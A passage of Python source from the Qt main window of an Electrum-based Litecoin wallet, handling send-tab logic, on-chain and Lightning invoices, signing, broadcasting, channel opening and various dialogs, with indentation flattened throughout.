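# spend_max(): builds a throwaway "send all" transaction to learn the fee, then fills the
# amount field with the post-fee value. If funds do not cover the dynamic fee estimate,
# it retries with fee=0 so the user can still lower the fee manually. Any extra fee
# reported by the 'get_tx_extra_fee' hook (e.g. a co-signing plugin) is subtracted too.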
def spend_max(self):
if run_hook('abort_send', self):
return
outputs = self.payto_e.get_outputs(True)
if not outputs:
return
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=self.get_coins(),
outputs=outputs,
fee=fee_est,
is_sweep=False)
try:
try:
tx = make_tx(None)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
tx = make_tx(0)
except (MultipleSpendMaxTxOutputs, NotEnoughFunds) as e:
self.max_button.setChecked(False)
self.show_error(str(e))
return
self.max_button.setChecked(True)
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
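# protect() is a small trampoline: the @protected decorator prompts for the wallet
# password (when the wallet is encrypted) and appends it as the final argument, so
# arbitrary callables can be run behind a password prompt.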
@protected
def protect(self, func, args, password):
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Litecoin Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
if len(errors) == 1 and not errors[0].is_multiline:
err = errors[0]
self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" +
f"{err.line_content[:40]}...\n\n"
f"{err.exc!r}")
else:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") +
f"{err.idx+1}: {err.line_content[:40]}... ({err.exc!r})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
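# pay_lightning_invoice(): amounts are handled in millisatoshis; the confirmation dialog
# shows the value truncated to satoshis (see the FIXME below). The actual payment runs in
# the wallet thread and retries up to LN_NUM_PAYMENT_ATTEMPTS times.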
def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]):
if amount_msat is None:
raise Exception("missing amount for LN invoice")
amount_sat = Decimal(amount_msat) / 1000
# FIXME this is currently lying to user as we truncate to satoshis
msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat))
if not self.question(msg):
return
self.save_pending_invoice()
attempts = LN_NUM_PAYMENT_ATTEMPTS
def task():
self.wallet.lnworker.pay(invoice, amount_msat=amount_msat, attempts=attempts)
self.wallet.thread.add(task)
def on_request_status(self, wallet, key, status):
if wallet != self.wallet:
return
if key not in self.wallet.receive_requests:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
def on_invoice_status(self, wallet, key):
if wallet != self.wallet:
return
req = self.wallet.get_invoice(key)
if req is None:
return
self.invoice_list.update_item(key, req)
def on_payment_succeeded(self, wallet, key):
description = self.wallet.get_label(key)
self.notify(_('Payment succeeded') + '\n\n' + description)
self.need_update.set()
def on_payment_failed(self, wallet, key, reason):
self.show_error(_('Payment failed') + '\n\n' + reason)
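# read_invoice(): turns the current send-tab contents into an invoice object. For
# Lightning it decodes the BOLT11 string from the pay-to field (filling in the amount
# from the amount field if the invoice carries none); for on-chain it validates the
# outputs and asks the wallet to create an invoice. Returns None (after showing an
# error) on failure.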
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
if not self._is_onchain:
invoice_str = self.payto_e.lightning_invoice
if not invoice_str:
return
if not self.wallet.has_lightning():
self.show_error(_('Lightning is disabled'))
return
invoice = LNInvoice.from_bech32(invoice_str)
if invoice.get_amount_msat() is None:
amount_sat = self.amount_e.get_amount()
if amount_sat:
invoice.amount_msat = int(amount_sat * 1000)
else:
self.show_error(_('No amount'))
return
return invoice
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.payto_URI)
def do_save_invoice(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.save_pending_invoice()
def save_pending_invoice(self):
if not self.pending_invoice:
return
self.do_clear()
self.wallet.save_invoice(self.pending_invoice)
self.invoice_list.update()
self.pending_invoice = None
def do_pay(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.do_pay_invoice(self.pending_invoice)
def pay_multiple_invoices(self, invoices):
outputs = []
for invoice in invoices:
outputs += invoice.outputs
self.pay_onchain_dialog(self.get_coins(), outputs)
def do_pay_invoice(self, invoice: 'Invoice'):
if invoice.type == PR_TYPE_LN:
assert isinstance(invoice, LNInvoice)
self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat())
elif invoice.type == PR_TYPE_ONCHAIN:
assert isinstance(invoice, OnchainInvoice)
self.pay_onchain_dialog(self.get_coins(), invoice.outputs)
else:
raise Exception('unknown invoice type')
def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
"""Return a list of selected coins or None.
Note: None means selection is not being used,
while an empty sequence means the user specifically selected that.
"""
return self.utxo_list.get_spend_list()
def pay_onchain_dialog(
self, inputs: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], *,
external_keypairs=None) -> None:
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = bool(external_keypairs)
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=is_sweep)
output_values = [x.value for x in outputs]
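# '!' is the "spend max" sentinel produced by the amount parser; at most one output may
# use it, and output_value passed to the confirm dialog is either '!' or the summed amount.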
if output_values.count('!') > 1:
self.show_error(_("More than one output set to spend max"))
return
output_value = '!' if '!' in output_values else sum(output_values)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
if d.not_enough_funds:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
if not d.have_enough_funds_assuming_zero_fees():
self.show_message(_('Not Enough Funds'))
return
# shortcut to advanced preview (after "enough funds" check!)
if self.config.get('advanced_preview'):
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
return
cancelled, is_send, password, tx = d.run()
if cancelled:
return
if is_send:
self.save_pending_invoice()
def sign_done(success):
if success:
self.broadcast_or_show(tx)
self.sign_tx_with_password(tx, callback=sign_done, password=password,
external_keypairs=external_keypairs)
else:
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
def preview_tx_dialog(self, *, make_tx, external_keypairs=None):
d = PreviewTxDialog(make_tx=make_tx, external_keypairs=external_keypairs,
window=self)
d.show()
def broadcast_or_show(self, tx: Transaction):
if not tx.is_complete():
self.show_transaction(tx)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx)
return
self.broadcast_transaction(tx)
@protected
def sign_tx(self, tx, *, callback, external_keypairs, password):
self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if external_keypairs:
# can sign directly
task = partial(tx.sign, external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
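# broadcast_transaction(): the network call runs on a non-GUI thread via WaitingDialog
# and returns a (success, message) pair consumed by broadcast_done on the GUI thread.
# If a BIP70 payment request is active, a payment ACK is sent to the requestor after a
# successful broadcast.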
def broadcast_transaction(self, tx: Transaction):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
return False, e.get_message_for_gui()
except BestEffortRequestFailed as e:
return False, repr(e)
# success
txid = tx.txid()
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return True, txid
# Capture the current top-level window now; the override may be gone by the time the thread returns
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def mktx_for_open_channel(self, funding_sat):
coins = self.get_coins(nonlocal_only=True)
make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(coins=coins,
funding_sat=funding_sat,
fee_est=fee_est)
return make_tx
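# open_channel(): validates the connect string, lets the user confirm the funding
# transaction in ConfirmTxDialog (preview disabled so it cannot be broadcast before the
# channel establishment handshake), then hands the funding tx to lnworker.open_channel
# on the wallet thread; an incomplete funding tx is shown for signing afterwards.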
def open_channel(self, connect_str, funding_sat, push_amt):
try:
extract_nodeid(connect_str)
except ConnStringFormatError as e:
self.show_error(str(e))
return
# use ConfirmTxDialog
# the funding tx (and hence its fee and txid) must be fixed before broadcasting, because the channel establishment flow needs the txid
make_tx = self.mktx_for_open_channel(funding_sat)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
# disable the preview button: the user must not broadcast the funding tx before the channel establishment flow completes
d.preview_button.setEnabled(False)
cancelled, is_send, password, funding_tx = d.run()
if not is_send:
return
if cancelled:
return
# read funding_sat from tx; converts '!' to int value
funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
def task():
return self.wallet.lnworker.open_channel(connect_str=connect_str,
funding_tx=funding_tx,
funding_sat=funding_sat,
push_amt_sat=push_amt,
password=password)
def on_success(args):
chan, funding_tx = args
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
if not funding_tx.is_complete():
message += '\n\n' + _('Please sign and broadcast the funding transaction')
self.show_message(message)
if not funding_tx.is_complete():
self.show_transaction(funding_tx)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(repr(e)))
WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b: bool) -> None:
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setAmount(pr.get_amount())
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.get_amount_sat() is not None:
self.amount_e.setAmount(lnaddr.get_amount_sat())
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self._is_onchain = b
self.max_button.setEnabled(b)
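# pay_to_URI(): parses a BIP21-style "litecoin:" URI. A request URL ('r') or a signed
# request (name + sig) switches to the asynchronous payment-request flow; otherwise the
# address/amount/label/message fields are copied straight into the send tab.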
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if not self.question(_("Do you want to remove {} from your wallet?").format(addr)):
return
try:
self.wallet.delete_address(addr)
except UserFacingException as e:
self.show_error(str(e))
else:
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit()
d = WindowModalDialog(self, _("Onchain Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
grid.addWidget(QLabel(amount_str), 1, 1)
if len(invoice.outputs) == 1:
grid.addWidget(QLabel(_("Address") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.get_address()), 2, 1)
else:
outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value)+ self.base_unit(), invoice.outputs))
grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0)
grid.addWidget(QLabel(outputs_str), 2, 1)
grid.addWidget(QLabel(_("Description") + ':'), 3, 0)
grid.addWidget(QLabel(invoice.message), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1)
if invoice.bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
pr.verify(self.contacts)
grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0)
grid.addWidget(QLabel(pr.get_requestor()), 5, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 6, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 6, 1)
def do_export():
key = pr.get_id()
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
f.write(pr.raw)
self.show_message(_('BIP70 invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Export'), do_export)
buttons = Buttons(exportButton, CloseButton(d))
else:
buttons = Buttons(CloseButton(d))
vbox.addLayout(grid)
vbox.addLayout(buttons)
d.exec_()
def show_lightning_invoice(self, invoice: LNInvoice):
lnaddr = lndecode(invoice.invoice, expected_hrp=constants.net.SEGWIT_HRP)
d = WindowModalDialog(self, _("Lightning Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0)
grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit()
grid.addWidget(QLabel(amount_str), 1, 1)
grid.addWidget(QLabel(_("Description") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.message), 2, 1)
grid.addWidget(QLabel(_("Hash") + ':'), 3, 0)
payhash_e = ButtonsLineEdit(lnaddr.paymenthash.hex())
payhash_e.addCopyButton(self.app)
payhash_e.setReadOnly(True)
vbox.addWidget(payhash_e)
grid.addWidget(payhash_e, 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1)
vbox.addLayout(grid)
invoice_e = ShowQRTextEdit()
invoice_e.addCopyButton(self.app)
invoice_e.setText(invoice.invoice)
vbox.addWidget(invoice_e)
vbox.addLayout(Buttons(CloseButton(d),))
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
'lnutil': lnutil,
})
c = commands.Commands(config=self.config,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
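# Each Commands method is wrapped so that, when invoked from the console, it runs
# against this window's wallet and can prompt for the password via password_dialog.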
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config','daemon']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.lightning_button = None
if self.wallet.has_lightning() and self.network:
self.lightning_button = StatusBarButton(read_QIcon("lightning_disconnected.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
self.update_lightning_icon()
sb.addPermanentWidget(self.lightning_button)
self.status_button = None
if self.network:
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog)
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
#sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lightning_icon(self):
if self.lightning_button is None:
return
if self.network.lngossip is None:
return
# display colorful lightning icon to signal connection
self.lightning_button.setIcon(read_QIcon("lightning.png"))
cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate()
# self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}")
progress_str = "??%"
if progress_percent is not None:
progress_str = f"{progress_percent}%"
if progress_percent and progress_percent >= 100:
self.lightning_button.setMaximumWidth(25)
self.lightning_button.setText('')
self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
else:
self.lightning_button.setMaximumWidth(25 + 4 * char_width_in_lineedit())
self.lightning_button.setText(progress_str)
self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
"Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
def change_password_dialog(self):
from electrum_ltc.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
vbox = QVBoxLayout()
wallet_type = self.wallet.db.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0)
if self.wallet.can_have_lightning():
grid.addWidget(QLabel(_('Enabled')), 5, 1)
local_nodeid = QLabel(bh2u(self.wallet.lnworker.node_keypair.pubkey))
local_nodeid.setTextInteractionFlags(Qt.TextSelectableByMouse)
grid.addWidget(QLabel(_('Lightning Node ID:')), 6, 0)
grid.addWidget(local_nodeid, 6, 1, 1, 3)
else:
grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1)
grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2)
vbox.addLayout(grid)
labels_clayout = None
if self.wallet.is_deterministic():
keystores = self.wallet.get_keystores()
ks_stack = QStackedWidget()
def select_ks(index):
ks_stack.setCurrentIndex(index)
# only show the combobox in case multiple accounts are available
if len(keystores) > 1:
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: select_ks(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
for ks in keystores:
ks_w = QWidget()
ks_vbox = QVBoxLayout()
ks_vbox.setContentsMargins(0, 0, 0, 0)
ks_w.setLayout(ks_vbox)
mpk_text = ShowQRTextEdit(ks.get_master_public_key())
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
run_hook('show_xpub_button', mpk_text, ks)
der_path_hbox = QHBoxLayout()
